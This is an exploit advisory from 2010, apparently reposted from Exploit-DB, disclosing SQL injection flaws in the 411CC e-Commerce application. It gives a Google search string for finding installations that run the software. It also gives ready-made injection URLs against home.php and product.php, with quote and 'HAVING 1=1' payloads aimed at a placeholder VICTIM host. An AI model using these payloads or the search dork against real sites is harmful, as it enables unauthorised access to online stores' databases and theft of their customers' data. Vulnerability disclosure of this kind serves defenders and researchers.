411cc – Multiple SQL Injections

  • 作者: KnocKout
    日期: 2010-10-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15276/
  • ===================================================================
    411CC e-Commerce <= String(') SQL Injection Vulnerabilities
    ===================================================================
    ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    [+] Author : KnocKout
    [~] Contact : knockoutr@msn.com
    ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~Web App. : 411CC e-Commerce
    ~Version : N/A
    ~Software: http://www.411cc.com/
    ~Vulnerability Style : SQL Injection
    ~Vulnerability Dir : CCART/customer/
    ~Google Keyword : "Powered By: 411CC"
    ~SQL Method : MSSQL no error
    ~String : '
    [~]Date : "18.10.2010"
    [~]Tested on : (L):Vista, (R):PHP/4.3.9
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     
    ~~~~~~~~ Explotation ~~~~~~~~~~~
    String (') SQL Injection Attack..
    http://VICTIM/cccart/customer/home.php?cat=59' {SQL Injection}
    http://VICTIM/cccart/customer/home.php?cat=59' HAVING 1=1/*
    http://VICTIM/cccart/customer/product.php?productid=' {SQL Injection}
    http://VICTIM/cccart/customer/product.php?productid='%27%20having%201=1/*
    ================================
    
     GoodLUCK.